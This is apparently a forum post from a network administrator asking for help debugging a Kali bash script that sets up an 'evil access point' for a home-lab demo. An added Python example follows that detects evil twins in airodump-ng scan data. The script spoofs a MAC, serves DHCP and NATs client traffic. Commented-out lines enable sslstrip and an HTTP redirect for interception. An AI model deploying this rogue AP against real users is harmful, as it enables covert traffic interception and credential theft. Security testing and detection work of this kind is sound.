I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.
(I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).
A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.
Trying this on Kali 2, I've made some changes from the original script:
Code:
#!/bin/bash
#____[start of config]_________________________
# these two values can be overwritten using
# arguments to the command
essid="FreeWiFi"
channel="4"
subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"
netmask="255.255.255.0"
dns="8.8.8.8"
# monitor-mode interface for airbase-ng and the upstream interface for NAT
moniface="wlan0mon"
upiface="eth0"
#____[end of config]___________________________
# everything below (interfaces, iptables, dhcpd) needs root
if [[ $EUID -ne 0 ]]; then
echo "this script must be run as root" >&2
exit 1
fi
# override the default essid if one is provided
if [[ -n "${1}" ]]; then
essid="${1}"
fi
# override the default channel if one is provided
if [[ -n "${2}" ]]; then
channel="${2}"
fi
function clear_iptables {
iptables --flush
iptables --table nat --flush
iptables --table nat --delete-chain
iptables --delete-chain
}
function cleanup {
echo "* cleaning up"
# anything that was never started only reports "no process found"; hide that
killall sslstrip 2>/dev/null
killall dhcpd 2>/dev/null
rm -rf /tmp/dhcpd
rm -f /tmp/dhcpd.conf
ifconfig at0 down 2>/dev/null
killall airbase-ng 2>/dev/null
clear_iptables
echo "* end of script"
exit 0
}
trap cleanup INT TERM
echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style standard;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
option subnet-mask ${netmask};
option broadcast-address ${broadcast};
option routers ${router};
option domain-name-servers ${dns};
range ${startip} ${endip};
}
EOF
echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c "${channel}" "${moniface}" &
# give airbase-ng a moment to create the at0 tap interface
sleep 3
if ! ifconfig at0 >/dev/null 2>&1; then
echo "at0 did not appear; is ${moniface} really in monitor mode?" >&2
cleanup
fi
echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -m 00:17:3F:03:13:37 at0
echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 "${router}" netmask "${netmask}"
# assigning the address above already installs the connected route for the
# subnet, so this explicit route is redundant; ignore its complaint if any
route add -net "${subnet}" netmask "${netmask}" gw "${router}" 2>/dev/null
echo "* starting dhcpd"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
# only chown if a dhcpd user exists; Debian-based systems run dhcpd as root
# and the original unconditional chown fails (and is ignored) on them
if id dhcpd >/dev/null 2>&1; then
chown -R dhcpd:dhcpd /tmp/dhcpd
fi
# -q only hides the banner, so a parse or bind error is still printed; stop
# here if dhcpd did not come up instead of waiting for leases that never arrive
if ! dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0; then
echo "dhcpd failed to start, see the error above" >&2
cleanup
fi
echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface "${upiface}" -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
# mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
# echo "* using ${mygw} as gateway"
# iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
#
# iptables -t nat -D PREROUTING 1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
# uncomment these two lines to turn on sslstrip
# echo "* starting sslstrip and logging results to log.txt"
# sslstrip -f -k -w log.txt &
echo "* setup complete, now we wait for connections"
echo "* enter CTRL-C to quit and cleanup"
while :; do
sleep 60
done
I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via DHCP. I want to be able to connect to the AP and have internet access through it for any client connected to it, to simulate a person standing up a malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open, so I can clamp down on unfettered access to it.
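For the detection side of the same proposal, here is an added example (not from the original post and not part of any Kali tool) that flags an evil twin like the one the script stands up: it parses AP rows in the layout of an airodump-ng CSV file and compares them against an allow-list of managed BSSIDs. The allow-list, the BSSIDs and the scan rows are constructed sample data, assumed for this example.

```python
import csv
import io

# Constructed allow-list (assumed values): ESSID -> (expected privacy, authorized BSSIDs).
AUTHORIZED = {
    "CorpGuest": ("WPA2", {"00:11:22:33:44:01", "00:11:22:33:44:02"}),
}

# Constructed sample rows in the layout of an airodump-ng CSV AP section; the header
# names are airodump-ng's, the rows themselves are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2015-09-01 10:00:00, 2015-09-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   9, CorpGuest,
00:17:3F:03:13:37, 2015-09-01 10:03:00, 2015-09-01 10:05:00,  4,  54, OPN ,     ,    , -35,   60,  0,   0.  0.  0.  0,   9, CorpGuest,
AA:BB:CC:DD:EE:FF, 2015-09-01 10:03:00, 2015-09-01 10:05:00,  4,  54, OPN ,     ,    , -38,   55,  0,   0.  0.  0.  0,   8, FreeWiFi,
"""

def parse_airodump_aps(text):
    """Return one dict per AP row, keyed by the CSV header, with padding stripped."""
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    rows = []
    for row in reader:
        if not row.get("BSSID"):
            continue  # blank separator before the station section of a real file
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows

def find_evil_twins(aps, authorized=AUTHORIZED):
    """Flag protected ESSIDs seen from unknown BSSIDs or as open networks, plus
    any unmanaged open AP, which is how a rogue 'FreeWiFi' shows up in a scan."""
    alerts = []
    for ap in aps:
        essid, bssid, privacy = ap["ESSID"], ap["BSSID"], ap["Privacy"] or "OPN"
        if essid not in authorized:
            if privacy == "OPN":
                alerts.append(f"unmanaged open AP {essid} ({bssid}) on channel {ap['channel']}")
            continue
        expected_privacy, bssids = authorized[essid]
        if bssid.lower() not in bssids:
            alerts.append(f"unknown BSSID {bssid} beaconing {essid} on channel {ap['channel']}")
        if privacy != expected_privacy:
            alerts.append(f"{bssid} offers {essid} as {privacy} instead of {expected_privacy}")
    return alerts

if __name__ == "__main__":
    for alert in find_evil_twins(parse_airodump_aps(SAMPLE_CSV)):
        print("ALERT:", alert)
```

Feeding it the CSV that airodump-ng writes with `-w` gives the same three kinds of alerts on live data; the allow-list is the part you maintain from your own controller inventory.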